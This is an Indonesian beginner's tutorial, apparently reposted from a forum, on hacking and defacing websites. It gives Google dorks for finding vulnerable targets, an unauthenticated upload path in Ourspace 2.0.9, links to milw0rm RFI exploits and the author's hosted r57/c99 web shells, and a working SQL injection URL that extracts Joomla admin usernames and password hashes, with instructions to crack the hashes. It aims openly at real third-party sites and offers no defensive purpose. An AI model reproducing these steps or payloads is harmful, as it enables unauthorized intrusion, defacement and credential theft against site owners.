[ Kumpulan Tutorial Hacking Web ]
Level : Pemula
Hampir semua para pemula yang pingin hacking web atau deface web, menggunakan jasa layanan
seacrh engine site google alias mengandalkan dork, xixixixixixi. Pokoknya ada suka dan duka
disaat pencarian target, xixixixixixi. Sukanya dapat tuh target dan dukanya gak dapat sama
sekali, wuakakakakakaka, dan tak lupa juga para pemula yang mau belajar hacking, gak lepas
dari sisi site milw0rm. Disini aku akan melampirkan beberapa teknik hacking web yang masih
berlaku dan bisa digunakan.
Hacking pada Ourspace 2.0.9
—————————
Awalnya buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343. Ok kita dah ambil toh. Sekarang kita akan mencoba
1. Buka google, trus ketik inurl:”/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di hack
contohnya : http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul kalimat upload files
5. Isi deh atau upload file html anda.
Hacking Remote File Inclusion
—————————–
Disini saya akan menguraikan dengan singkat dari teknik hacking RFI.
1. Buka google trus ketik “Php Blue Dragon” pada search enginenya
2. Setelah itu cari situs yang mau di hack
Contohnya : http://www.komix91.ovh.org (site dikiri, da lama aku hack tapi lupa bugnya yang mana, hehehehehehe)
Ngomong-ngomong karena aku da lupa bug mana tuh, lebih baik kalian cari aja di http://www.milw0rm.com
Klik search trus ketik PHP BLUE DRAGON. Ini hasil dari serach pada milw0rm.
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
Oke, selanjutnya kalian coba aja sendiri ya. Ngomong-ngomong kalau ada kata evil code pada bug situ itu
maksudnya web shell. Kalau gak ada web shell pake punya aku aja. Itung-itung amal, hehehehehehehe
- http://www.geocities.com/engel_hacking/r57.txt?
- http://www.geocities.com/engel_hacking/c99.txt?
- http://www.geocities.com/engel_hacking/Ekin0x.txt?
Well, jangan terpengaruh di link web shell aku yang ada kata engel_hacking, aku bukan malaikat hacking, tapi
ngaku-ngaku malaikat hacking, wuakakakakakakakaka. Padahal gak hebat amat. Cuma Internet Holic doank. Hehehe
3. Selamat mencoba ya. Semoga sukses.
Hacking SQL Injection
———————
Disini saya akan menguraikan singkat teknik hacking SQL injection. Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh disini saya mengambil BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:”com_simpleshop” atau allinurl: “com_simpleshop”section disamping kiri ini berupa dork untuk me-
ncari bug sql pada web.
2. Singkat penjelasan kalau kita telah mendapatnya sekarang kita injeck. Contoh :
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0×3a,password),0,concat(username,0×3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, kalau belum ada silakan download di google.
4. Selamat Mencoba. Semoga sukses
Pesan sebelum mencoba : Disini saya hanya menguraikan beberapa teknik hacking yang sering digunakan oleh pemula, seperti yang telah saya jelaskan diatas.
banyak pemula pingin hacking web atau deface, menggunakan layanan site google dan site milw0rm.
Kayaknya da cukup penjelasan singkat saya mengenai hacking. Informasi lebih lanjut anda bisa memncari di beberapa sumber yang lebih
detail membahas tentang hacking. Lagian disini saya hanya menjelaskan dengan singkat and just internet holic.
” Jangan pernah malu untuk menjadi seorang pemula ”
from : http://indonesiacoder.forumotion.com/cyber-art-f13/tutorial-hacking-yang-bisa-anda-pelajari-t274.htm
